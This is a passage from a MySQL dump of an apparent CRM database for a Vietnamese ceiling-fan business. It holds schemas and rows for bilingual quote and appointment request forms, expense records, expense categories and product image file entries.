  `notify_request_submitted` int(11) NOT NULL DEFAULT 0
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblestimate_request_forms`
--

INSERT INTO `tblestimate_request_forms` (`id`, `form_key`, `type`, `name`, `form_data`, `recaptcha`, `status`, `submit_btn_name`, `submit_btn_bg_color`, `submit_btn_text_color`, `success_submit_msg`, `submit_action`, `submit_redirect_url`, `language`, `dateadded`, `notify_type`, `notify_ids`, `responsible`, `notify_request_submitted`) VALUES
(1, '59260a6ce1468784f2d96e831b6190e8', '', 'Tư Vấn | Hỗ Trợ Bán Hàng | Báo giá', '[{\"type\":\"text\",\"label\":\"Your Name | Tên liên hệ\",\"className\":\"form-control form-col-6\",\"name\":\"text-1641703547056\",\"subtype\":\"text\"},{\"type\":\"text\",\"required\":true,\"label\":\"Phone | Số điện thoại\",\"className\":\"form-control form-col-6\",\"name\":\"text-1641703946465\",\"subtype\":\"text\",\"maxlength\":\"10\"},{\"type\":\"text\",\"subtype\":\"email\",\"required\":true,\"label\":\"Email | Hộp thư\",\"className\":\"form-control form-col-6\",\"name\":\"email\"},{\"type\":\"select\",\"label\":\"What field are you working in? | Lĩnh vực bạn đang làm ?\",\"className\":\"form-control form-col-6\",\"name\":\"select-1641703623622\",\"multiple\":true,\"values\":[{\"label\":\"Chủ đầu tư | Owner\",\"value\":\"chu-dau-tu\",\"selected\":true},{\"label\":\"Nhà thầu thi công | Contractor\",\"value\":\"nha-thau-thi-cong\"},{\"label\":\"Đơn vị thiết kế  | Design Consulting\",\"value\":\"don-vi-thiet-ke\"},{\"label\":\"Nhà thầu thi công trọn gói | Design & Build Contractor\",\"value\":\"thiet-ke-thi-cong\"}]},{\"type\":\"select\",\"label\":\"Choose the product you are interested in? |Chọn sản phẩm mà bạn đang quan tâm ?&nbsp;\",\"className\":\"form-control form-col-6\",\"name\":\"select-1647064433099\",\"multiple\":true,\"values\":[{\"label\":\"Quạt Trần HVLS (Công Nghiệp, Nhà Ở Thương Mại...) | Overhead Fans\",\"value\":\"option-1\",\"selected\":true},{\"label\":\"Quạt Trần Đèn Trang Trí | Ceiling Fans\",\"value\":\"option-2\"},{\"label\":\"Quạt Trần Thông Minh Haiku  | Haiku Smart Fans\",\"value\":\"option-3\"},{\"label\":\"Quạt Hút, Thổi Công Nghiệp  | Directional Fans\",\"value\":\"option-5\"},{\"label\":\"Quạt Làm Mát Hơi Nước Công Nghiệp | Cooler Air\",\"value\":\"option-6\"}]},{\"type\":\"file\",\"label\":\"Attachments (select multiple files) | Tệp tin đính kèm (chọn nhiều tệp cùng lúc)\",\"className\":\"form-control form-col-6\",\"name\":\"file-input\",\"subtype\":\"file\",\"multiple\":true},{\"type\":\"textarea\",\"label\":\"Message | Nội dung yêu cầu\",\"description\":\"More info | Thông tin cho biết thêm (ví dụ: độ cao trần  chất liệu trần diện tích lắp quạt  model...)\",\"className\":\"form-control\",\"name\":\"textarea-1641703571724\",\"subtype\":\"textarea\",\"maxlength\":\"1000\"}]', 0, 2, 'SEND - GỞI YÊU CẦU', '#537f53', '#ffffff', 'Yêu cầu của bạn đã gởi đi thành công. Nhân viên của chúng tôi sẽ liên hệ lại với quý khách. Cảm ơn bạn đã quan tâm.', 0, '', 'vietnamese', '2021-12-27 23:21:38', 'roles', 'a:2:{i:0;s:1:\"2\";i:1;s:1:\"4\";}', 1, 1),
(3, '7278bd4d759f40301a83db30b428f753', '', 'e-Letter', '[{\"type\":\"text\",\"subtype\":\"email\",\"required\":true,\"label\":\"Đăng ký nhận thông tin\",\"description\":\"đăng ký thông tin khuyến mãi.\",\"className\":\"form-col-6 form-control\",\"name\":\"email\"}]', 0, 2, 'ĐĂNG KÝ', '#537f53', '#ffffff', 'Bạn đã đăng ký thành công. Xin cảm ơn !', 0, '', 'vietnamese', '2023-03-14 16:45:30', 'specific_staff', 'a:0:{}', 0, 1),
(4, '4c73951df9df0787493cb75a920aa73a', '', 'Get-a-Quote', '[{\"type\":\"paragraph\",\"subtype\":\"p\",\"label\":\"<span xss=\'\'>Bạn hãy để lại thông tin quan tâm sản phẩm, model, series. Chúng tôi sẽ liên hệ lại ngay.</span>\"},{\"type\":\"text\",\"required\":true,\"label\":\"Số điện thoại\",\"className\":\"form-control form-col-6\",\"name\":\"text-1698823549730\",\"subtype\":\"text\",\"maxlength\":\"10\"},{\"type\":\"text\",\"subtype\":\"email\",\"required\":true,\"label\":\"Email\",\"className\":\"form-control form-col-6\",\"name\":\"email\"},{\"type\":\"text\",\"label\":\"Model sản phẩm\",\"description\":\"Hãy cho biết Model sản phẩm đang quan tâm\",\"className\":\"form-control form-col-6\",\"name\":\"text-1698823699651\",\"subtype\":\"text\"},{\"type\":\"file\",\"label\":\"Đính kèm hình ảnh\",\"className\":\"form-control form-col-6\",\"name\":\"file-input\",\"subtype\":\"file\",\"multiple\":true},{\"type\":\"textarea\",\"label\":\"Để lại nội dung lời nhắn\",\"description\":\"Hãy cho biết thông tin diện tích làm mát (ví dụ như: Dài x Rộng X Độ Cao trần nhà/xưởng)\",\"className\":\"form-control\",\"name\":\"textarea-1698823815458\",\"subtype\":\"textarea\"}]', 0, 2, 'GỞI YÊU CẦU', '#167288', '#ffffff', 'Thông tin bạn gởi đi thành công. Vui lòng đợi phản hồi từ nhân viên Sales của chúng tôi !', 0, '', 'vietnamese', '2023-11-01 14:24:00', 'roles', 'a:1:{i:0;s:1:\"2\";}', 1, 1),
(5, '5684a9ce18178dcf284f0845b9003066', '', 'Đặt lịch hẹn', '[{\"type\":\"paragraph\",\"subtype\":\"p\",\"label\":\"YÊU CẦU CUỘC HẸN - KHẢO SÁT - TƯ VẤN - BẢO DƯỠNG\",\"className\":\"font-family: \\\"Saira Condensed\\\" Sans-serif;  font-size: 16px; font-weight: 600;\"},{\"type\":\"text\",\"label\":\"Tiêu đề\",\"className\":\"form-control\",\"name\":\"text-1700744014012\",\"subtype\":\"text\"},{\"type\":\"textarea\",\"label\":\"Mô tả công việc cần làm việc\",\"className\":\"form-control\",\"name\":\"textarea-1700744323314\",\"subtype\":\"textarea\"},{\"type\":\"text\",\"label\":\"Tên liên hệ\",\"className\":\"form-control\",\"name\":\"text-1700744052400\",\"subtype\":\"text\"},{\"type\":\"text\",\"subtype\":\"email\",\"required\":true,\"label\":\"Email\",\"className\":\"form-control\",\"name\":\"email\"},{\"type\":\"text\",\"label\":\"Số điện thoại\",\"className\":\"form-control\",\"name\":\"text-1700744093166\",\"subtype\":\"text\"},{\"type\":\"date\",\"label\":\"Ngày thời gian - lịch hẹn\",\"className\":\"form-control\",\"name\":\"date-1700744112471\"}]', 0, 2, 'ĐĂNG KÝ GỞI ĐI', '#537f53', '#ffffff', 'Lịch hẹn của bạn đã được gởi đi thành công. Đội ngũ hỗ trợ tư vấn chúng tôi sẽ liên hệ với bạn ngay sau 2h nữa. <br />\r\nNếu bạn cần hỗ trợ gấp hãy liên hệ Hotline: 0909 899 367', 0, '', 'vietnamese', '2023-11-23 19:51:30', 'roles', 'a:5:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";}', 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `tblestimate_request_status`
--

CREATE TABLE `tblestimate_request_status` (
  `id` int(10) UNSIGNED NOT NULL,
  `name` varchar(50) NOT NULL,
  `statusorder` int(11) DEFAULT NULL,
  `color` varchar(10) DEFAULT NULL,
  `flag` varchar(30) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblestimate_request_status`
--

INSERT INTO `tblestimate_request_status` (`id`, `name`, `statusorder`, `color`, `flag`) VALUES
(1, 'Cancelled', 1, '#808080', 'cancelled'),
(2, 'Processing', 2, '#0d7bf0', 'processing'),
(3, 'Completed', 3, '#fbc906', 'completed');

-- --------------------------------------------------------

--
-- Table structure for table `tblevents`
--

CREATE TABLE `tblevents` (
  `eventid` int(11) NOT NULL,
  `title` mediumtext NOT NULL,
  `description` text DEFAULT NULL,
  `userid` int(11) NOT NULL,
  `start` datetime NOT NULL,
  `end` datetime DEFAULT NULL,
  `public` int(11) NOT NULL DEFAULT 0,
  `color` varchar(10) DEFAULT NULL,
  `isstartnotified` tinyint(1) NOT NULL DEFAULT 0,
  `reminder_before` int(11) NOT NULL DEFAULT 0,
  `reminder_before_type` varchar(10) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblexpenses`
--

CREATE TABLE `tblexpenses` (
  `id` int(11) NOT NULL,
  `category` int(11) NOT NULL,
  `currency` int(11) NOT NULL,
  `amount` decimal(15,2) NOT NULL,
  `tax` int(11) DEFAULT NULL,
  `tax2` int(11) NOT NULL DEFAULT 0,
  `reference_no` varchar(100) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `expense_name` varchar(191) DEFAULT NULL,
  `clientid` int(11) NOT NULL,
  `project_id` int(11) NOT NULL DEFAULT 0,
  `billable` int(11) DEFAULT 0,
  `invoiceid` int(11) DEFAULT NULL,
  `paymentmode` varchar(50) DEFAULT NULL,
  `date` date NOT NULL,
  `recurring_type` varchar(10) DEFAULT NULL,
  `repeat_every` int(11) DEFAULT NULL,
  `recurring` int(11) NOT NULL DEFAULT 0,
  `cycles` int(11) NOT NULL DEFAULT 0,
  `total_cycles` int(11) NOT NULL DEFAULT 0,
  `custom_recurring` int(11) NOT NULL DEFAULT 0,
  `last_recurring_date` date DEFAULT NULL,
  `create_invoice_billable` tinyint(1) DEFAULT NULL,
  `send_invoice_to_customer` tinyint(1) NOT NULL,
  `recurring_from` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `addedfrom` int(11) NOT NULL,
  `vendor` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblexpenses`
--

INSERT INTO `tblexpenses` (`id`, `category`, `currency`, `amount`, `tax`, `tax2`, `reference_no`, `note`, `expense_name`, `clientid`, `project_id`, `billable`, `invoiceid`, `paymentmode`, `date`, `recurring_type`, `repeat_every`, `recurring`, `cycles`, `total_cycles`, `custom_recurring`, `last_recurring_date`, `create_invoice_billable`, `send_invoice_to_customer`, `recurring_from`, `dateadded`, `addedfrom`, `vendor`) VALUES
(2, 3, 3, 130000.00, 0, 0, '', 'Mua PIN thay thế', 'Mua hàng điều khiển', 0, 0, 0, NULL, '', '2022-11-13', NULL, 0, 0, 0, 0, 0, NULL, 0, 0, NULL, '2022-11-13 13:03:15', 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblexpenses_categories`
--

CREATE TABLE `tblexpenses_categories` (
  `id` int(11) NOT NULL,
  `name` varchar(191) NOT NULL,
  `description` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblexpenses_categories`
--

INSERT INTO `tblexpenses_categories` (`id`, `name`, `description`) VALUES
(1, 'Văn phòng', 'Các chi phí PCN, mua Văn phòng phẩm, tiền vệ sinh...'),
(2, 'Nhân viên tạm ứng', 'Nhân viên tạm ứng lương...'),
(3, 'Mua vật tư', 'Chi phí mua hàng, vật tư, vận chuyển hàng hoá...'),
(4, 'Vận chuyển (Grab, giao hàng...)', 'Vận chuyển Grab');

-- --------------------------------------------------------

--
-- Table structure for table `tblfiles`
--

CREATE TABLE `tblfiles` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(20) NOT NULL,
  `file_name` varchar(191) NOT NULL,
  `filetype` varchar(40) DEFAULT NULL,
  `visible_to_customer` int(11) NOT NULL DEFAULT 0,
  `attachment_key` varchar(32) DEFAULT NULL,
  `external` varchar(40) DEFAULT NULL,
  `external_link` text DEFAULT NULL,
  `thumbnail_link` text DEFAULT NULL COMMENT 'For external usage',
  `staffid` int(11) NOT NULL,
  `contact_id` int(11) DEFAULT 0,
  `task_comment_id` int(11) NOT NULL DEFAULT 0,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblfiles`
--

INSERT INTO `tblfiles` (`id`, `rel_id`, `rel_type`, `file_name`, `filetype`, `visible_to_customer`, `attachment_key`, `external`, `external_link`, `thumbnail_link`, `staffid`, `contact_id`, `task_comment_id`, `dateadded`) VALUES
(7, 1927, 'commodity_item_file', 'zini_witcrm_akmani_wh.jpg', 'image/jpeg', 0, '1adeb95e349c15ca604dd71f10de308c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:16:35'),
(8, 1859, 'commodity_item_file', 'zini_witcrm_ABACUS60.jpg', 'image/jpeg', 0, 'f42262a5c606245e9bd5cb8dd2307b8b', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:21:13'),
(9, 1859, 'commodity_item_file', 'zini_witcrm_ABACUS60.jpg', 'image/jpeg', 0, 'c0e7071f0af32572c6b0b4823d9e4001', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:21:37'),
(10, 1883, 'commodity_item_file', 'zini_witcrm_onix.jpg', 'image/jpeg', 0, '0059783ea47bf6ff637d4e4dfdf337ee', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:22:36'),
(11, 1842, 'commodity_item_file', 'zini_witcrm_cocoa_bamboo.jpg', 'image/jpeg', 0, 'f0cf4fd6cb900c5d3a4621e4ebc75d32', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:56:48'),
(12, 1841, 'commodity_item_file', 'zini_witcrm_haiku_60.jpg', 'image/jpeg', 0, '16763614dedb936ea5bdd857d675f58d', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:57:55'),
(13, 1837, 'commodity_item_file', 'zini_witcrm_84.jpg', 'image/jpeg', 0, '1efaf114c6ba05b60e4d78f41f27c606', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:59:04'),
(14, 1828, 'commodity_item_file', 'zini_witcrm_84.jpg', 'image/jpeg', 0, 'bc41896d45977d967821989972e92318', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:59:17'),
(15, 1843, 'commodity_item_file', 'zini_witcrm_haiku_caramel.jpg', 'image/jpeg', 0, 'dd9cf4797c4dbf55628cdddd51d572ab', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:59:36'),
(16, 1840, 'commodity_item_file', 'zini_witcrm_haiku_caramel.jpg', 'image/jpeg', 0, 'ce953623934ac14271e68b1583f48310', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 10:59:46'),
(17, 1836, 'commodity_item_file', 'zini_witcrm_84-c.jpg', 'image/jpeg', 0, '3c86da8db702890362ef275728b8b011', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:00:35'),
(18, 1829, 'commodity_item_file', 'zini_witcrm_84-c.jpg', 'image/jpeg', 0, '0fd412fafb494e46fcebf03a3a42e17b', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:00:45'),
(20, 1881, 'commodity_item_file', 'zini_witcrm_pearl60-d.jpg', 'image/jpeg', 0, 'ad272c29c108d6cebcab1266bd3a699c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:05:49'),
(21, 1880, 'commodity_item_file', 'zini_witcrm_black_pearl.jpg', 'image/jpeg', 0, 'c6501ebe2659056ffea616c203442124', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:06:25'),
(22, 1879, 'commodity_item_file', 'zini_witcrm_pear_wwh.jpg', 'image/jpeg', 0, '4dc65335ad88da4551d8208d70aea7bb', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:06:56'),
(23, 1878, 'commodity_item_file', 'zini_witcrm_aroma62_led.jpg', 'image/jpeg', 0, 'a45e590ae3ce40eecca36f2861399f24', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:07:08'),
(24, 1877, 'commodity_item_file', 'zini_witcrm_aroma52_maple.jpg', 'image/jpeg', 0, '31e0339c31a49038d63d674ad006a016', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:17:33'),
(25, 1876, 'commodity_item_file', 'zini_witcrm_aroma62_led.jpg', 'image/jpeg', 0, '765b5279851951547e64c58f27df657e', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:17:46'),
(26, 1875, 'commodity_item_file', 'zini_witcrm_aroma52_maple.jpg', 'image/jpeg', 0, '7f844abfed90ff6ccd34881d63f5c943', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:17:57'),
(27, 1874, 'commodity_item_file', 'zini_witcrm_sandu66.jpg', 'image/jpeg', 0, '50d0535b8389d7e3802cce200ba94e91', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:18:51'),
(28, 1872, 'commodity_item_file', 'zini_witcrm_crance.jpg', 'image/jpeg', 0, 'e28b05bbe1dbb7aa9a9e0a656a2a13c0', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:19:06'),
(29, 1907, 'commodity_item_file', 'zini_witcrm_avia_led.jpg', 'image/jpeg', 0, 'a10e017bc52a9ca5b1ca1f9f8fa8279e', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:19:58'),
(30, 1911, 'commodity_item_file', 'zini_witcrm_detal100koa.jpg', 'image/jpeg', 0, '8d63632f7eaba55d4e9cc7a73efcb446', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:21:32'),
(31, 1910, 'commodity_item_file', 'zini_witcrm_3039c.jpg', 'image/jpeg', 0, 'ddece51e8af2146e1e7e4399e6ac65ca', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:35:16'),
(32, 1909, 'commodity_item_file', 'zini_witcrm_3039.jpg', 'image/jpeg', 0, '7da106da1bb80f342dd8402f6cb416b6', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:36:40'),
(33, 1914, 'commodity_item_file', 'zini_witcrm_line60.jpg', 'image/jpeg', 0, '4905a2b0d731bcd8dbe9afa66dccd70c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:44:51'),
(34, 1913, 'commodity_item_file', 'zini_witcrm_lineblack.jpg', 'image/jpeg', 0, '24b293c73db910be8c7b98b98316e8c0', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:45:49'),
(35, 1912, 'commodity_item_file', 'zini_witcrm_detal100.jpg', 'image/jpeg', 0, '56b8cc445c79983c0cfa0ded98bdff99', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:46:01'),
(36, 1906, 'commodity_item_file', 'zini_witcrm_avia_led-1.jpg', 'image/jpeg', 0, '782d5348f9f4479a4d6d21761409aa4f', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:46:18'),
(37, 1905, 'commodity_item_file', 'zini_witcrm_008W.jpg', 'image/jpeg', 0, 'c1709432b9350d3d82bf1f39180ec750', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:46:33'),
(38, 1903, 'commodity_item_file', 'zini_witcrm_camela56.jpg', 'image/jpeg', 0, '1b93c5d722549caeaec3c620a4eb5b1c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:46:44'),
(39, 1926, 'commodity_item_file', 'zini_witcrm_marelli.jpg', 'image/jpeg', 0, 'bcfd111a1a635aff97a0cbacaf3de1ba', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:47:04'),
(40, 1895, 'commodity_item_file', 'zini_witcrm_saba_anti.jpg', 'image/jpeg', 0, '60707bda47b05cf32d2e8e889825d97e', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:47:58'),
(42, 1898, 'commodity_item_file', 'zini_witcrm_tobago_sl.jpg', 'image/jpeg', 0, '4247a4f18cd0be766cbd68d61b778883', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:48:27'),
(43, 1899, 'commodity_item_file', 'zini_witcrm_tobago_wh.jpg', 'image/jpeg', 0, '37a312d030a4df9e2e4b04b40bebc08e', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:48:39'),
(44, 1900, 'commodity_item_file', 'zini_witcrm_tobago_koa.jpg', 'image/jpeg', 0, 'b2c825bdfd3da2e9db84e9666e2f3b61', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:48:51'),
(45, 1891, 'commodity_item_file', 'zini_witcrm_7062s.jpg', 'image/jpeg', 0, '93941e675a278fb43a71ec5d146c8a17', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:49:05'),
(46, 1890, 'commodity_item_file', 'zini_witcrm_7062a.jpg', 'image/jpeg', 0, 'db43cec774c5642a0a1d702b96cc730e', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 11:49:26'),
(47, 1889, 'commodity_item_file', 'zini_witcrm_7062w.jpg', 'image/jpeg', 0, '8c8d8e776e90b374f5cc3c84a4bf6b45', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:04:20'),
(48, 1887, 'commodity_item_file', 'zini_witcrm_mate.jpg', 'image/jpeg', 0, 'cdd4c518e23e7ce8d1973634dce6633c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:04:34'),
(49, 1886, 'commodity_item_file', 'zini_witcrm_.jpg', 'image/jpeg', 0, '942a59ad790ad2ace3fafad840b0ed9d', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:04:59'),
(50, 1888, 'commodity_item_file', 'zini_witcrm_7062b.jpg', 'image/jpeg', 0, '0d20a44e06d5273059be9a73fa4fbc2a', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:05:25'),
(51, 1866, 'commodity_item_file', 'zini_witcrm_aroma62_led.jpg', 'image/jpeg', 0, '46727369269f362e901a17b0d6818a7d', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:06:04'),
(52, 1864, 'commodity_item_file', 'zini_witcrm_akmani_bn.jpg', 'image/jpeg', 0, '53b37522ad7f1e1671a242d5388f54b6', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:06:17'),
(53, 1863, 'commodity_item_file', 'zini_witcrm_akmani_bn.jpg', 'image/jpeg', 0, '747818916100d13f643977245f2f0f47', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:06:32'),
(54, 1862, 'commodity_item_file', 'zini_witcrm_IRIS60.jpg', 'image/jpeg', 0, '5159198eb695f9f41efc86f8b10a80d4', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:06:42'),
(55, 1861, 'commodity_item_file', 'zini_witcrm_IRIS60.jpg', 'image/jpeg', 0, '250ff98b954d14e19bbb722e2a5309ec', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:06:53'),
(56, 1860, 'commodity_item_file', 'zini_witcrm_.jpg', 'image/jpeg', 0, '13ed9501e36f6e13b886a660ef0c5148', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:07:03'),
(57, 1857, 'commodity_item_file', 'zini_witcrm_SINO_LED_DW.jpg', 'image/jpeg', 0, '169951154d03bcf970479fd4ac039351', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:07:19'),
(58, 1856, 'commodity_item_file', 'zini_witcrm_sino-wh.jpg', 'image/jpeg', 0, 'c55f8c6b736b989f73a9edad9fe0f4e2', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:08:55'),
(59, 1855, 'commodity_item_file', 'zini_witcrm_sinow.jpg', 'image/jpeg', 0, '5a53acbef0dcec3e391ba11384cc5e70', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:09:07'),
(60, 1854, 'commodity_item_file', 'zini_witcrm_sino_bl.jpg', 'image/jpeg', 0, 'ca158f95da2f8ca6a50553b5d4189c96', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:09:27'),
(61, 1853, 'commodity_item_file', 'zini_witcrm_haiku_L_wh.jpg', 'image/jpeg', 0, 'a1a81d926973e697dad24c3ef69dd2cc', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:09:51'),
(62, 1852, 'commodity_item_file', 'zini_witcrm_haiku_L.jpg', 'image/jpeg', 0, '8d23cee1afa21f91e0b13f9743eeb224', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:10:01'),
(63, 1851, 'commodity_item_file', 'zini_witcrm_haiku_L.jpg', 'image/jpeg', 0, '215426b15de67f6ecb7ae25b2986ad28', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:10:12'),
(64, 1850, 'commodity_item_file', 'zini_witcrm_haiku_L_wh.jpg', 'image/jpeg', 0, 'fdc4e8a0eba1cfd84ddd8ac753dc9510', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:10:21'),
(65, 1849, 'commodity_item_file', 'zini_witcrm_haikuL_60.jpg', 'image/jpeg', 0, '120e9a0c3380654e2da5c36acb5bdcc9', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:11:27'),
(66, 1848, 'commodity_item_file', 'zini_witcrm_haikuL-60_ư.jpg', 'image/jpeg', 0, 'c44f13b2030c27c3993be9ce7de81596', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:11:44'),
(67, 1847, 'commodity_item_file', 'zini_witcrm_haiku_i_b.jpg', 'image/jpeg', 0, '49acfcbc9f1ad1cb12a25bd4307a638b', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:13:03'),
(68, 1846, 'commodity_item_file', 'zini_witcrm_haiku_i_w.jpg', 'image/jpeg', 0, 'a75fdc0ea541df4d4b70e3cec9afd2e8', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:13:13'),
(69, 1845, 'commodity_item_file', 'zini_witcrm_haiku_i_w.jpg', 'image/jpeg', 0, '234041beffe2e9cb9bf0d6b46c452f64', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:13:26'),
(70, 1844, 'commodity_item_file', 'zini_witcrm_haiku_i_b.jpg', 'image/jpeg', 0, 'cf50f8b82fc06fe9fa0aeb971e061f48', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:13:35'),
(72, 1819, 'commodity_item_file', 'zini_witcrm_me.jpg', 'image/jpeg', 0, '15e63b61a9a19b0fe779e7f1353c5a25', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:14:26'),
(73, 1820, 'commodity_item_file', 'zini_witcrm_mere.jpg', 'image/jpeg', 0, 'a7191a1b0a5d2697998c5e0bb163c272', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:14:45'),
(74, 1818, 'commodity_item_file', 'zini_witcrm_meta_mere.jpg', 'image/jpeg', 0, '27cb262d4813178490a6fd507f7ada1b', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:15:20'),
(75, 1817, 'commodity_item_file', 'zini_witcrm_essence.jpg', 'image/jpeg', 0, '011134b97a613b2440cd171bfa61b82c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:16:25'),
(76, 1816, 'commodity_item_file', 'zini_witcrm_essence.jpg', 'image/jpeg', 0, '10f1cc7dfb15608b31524a1b9ca46098', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:16:35'),
(77, 1815, 'commodity_item_file', 'zini_witcrm_essence.jpg', 'image/jpeg', 0, '8256a2384186c21e4949688cf967ef3e', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:16:44'),
(78, 1814, 'commodity_item_file', 'zini_witcrm_essence.jpg', 'image/jpeg', 0, '2a332340abe264a590ef6d92969d25df', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:16:55'),
(79, 1813, 'commodity_item_file', 'zini_witcrm_s1.jpg', 'image/jpeg', 0, 'bbfc8a87a307c3b979077ca99642772f', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:17:34'),
(80, 1812, 'commodity_item_file', 'zini_witcrm_s1.jpg', 'image/jpeg', 0, '49ef5257d4438707bea0d6954d15ad6f', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:17:43'),
(81, 1811, 'commodity_item_file', 'zini_witcrm_s1.jpg', 'image/jpeg', 0, 'd8e9ae0e17e6cc701ca5085f25c20da8', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:17:55'),
(82, 1810, 'commodity_item_file', 'zini_witcrm_s3.jpg', 'image/jpeg', 0, '708932aae3cdc0a8fcc7830e01f09b7b', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:18:32'),
(83, 1809, 'commodity_item_file', 'zini_witcrm_s3.jpg', 'image/jpeg', 0, '05245922e55c9a6375b6274e4eafcf86', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:18:43'),
(84, 1808, 'commodity_item_file', 'zini_witcrm_s3.jpg', 'image/jpeg', 0, '602ad0763713ff9b2385b996c7e755c6', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:19:48'),
(85, 1807, 'commodity_item_file', 'zini_witcrm_s3.jpg', 'image/jpeg', 0, '4856f0351ac8d932c9dcdc0bdab60b7c', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:20:03'),
(86, 1806, 'commodity_item_file', 'zini_witcrm_i6.jpg', 'image/jpeg', 0, 'b4bcaa6f6ae8ccea74d5e2f1d38dc933', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:20:51'),
(87, 1805, 'commodity_item_file', 'zini_witcrm_i6.jpg', 'image/jpeg', 0, 'c95f911f827fb36cbc3e6da342cc11b1', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:20:59'),
(88, 1804, 'commodity_item_file', 'zini_witcrm_i6-w.jpg', 'image/jpeg', 0, '7b93d7f539e01247ce54fea27e4fd53a', NULL, NULL, NULL, 1, 0, 0, '2022-01-11 12:21:13'),
